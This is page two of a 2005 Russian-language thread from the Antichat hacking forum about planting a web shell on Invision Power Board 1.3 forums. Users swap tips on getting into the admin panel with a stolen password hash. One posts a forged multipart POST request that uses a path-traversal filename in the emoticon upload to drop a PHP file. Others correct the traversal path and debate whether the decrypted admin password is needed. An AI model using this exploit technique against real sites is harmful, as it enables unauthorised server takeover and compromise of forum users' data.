ANTICHAT
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Залить шелл через подделку http запросов, на примере ipb 1.3 (https://forum.antichat.xyz/showthread.php?t=5461)

link 25.03.2005 05:38
Рзве текст шела влезет в инеткряк?

link 25.03.2005 05:48
Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.

Algol 27.03.2005 23:53
Цитата:
Сообщение от link
Рзве текст шела влезет в инеткряк?
Свободно...

XJIOP 10.04.2005 04:53
народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?

XJIOP 10.04.2005 05:02
с этим скриптом выдает ошибку

id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE-->

прально ли я понял?

POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=ид админа;
pass_hash=тут понято;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

ид сесия?
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php"
Content-Type: application/octet-stream

нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)?

(-=util=-) 10.04.2005 10:11
мдя =)
Этот путь указан неверно.
../../forum/uploads/lol.php

../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой)
допустим www.lol.ru/dir1/dir2/dir3/admin.php
находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file
чтобы в dir1 то ../../../upload_file
Вот так если я нечего непутаю.

Второе у тебя нехватает самого аплоада

<% echo("php script") %>
-----------------------------7d43942c405bc--

BlackPrince 10.04.2005 10:26
без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?

(-=util=-) 10.04.2005 10:45
для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.

Algol 10.04.2005 11:11
Цитата:
Сообщение от (-=util=-)
для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
Нет, расшифрованный админский пароль все равно нужен. Иначе ты adsess не узнаешь

(-=util=-) 10.04.2005 13:03
ну ептель тогда нет смысла париться с этими паками :\


Время: 16:27
Страница 2 из 3 < 1 2 3 >
Показывать 40 сообщений этой темы на одной странице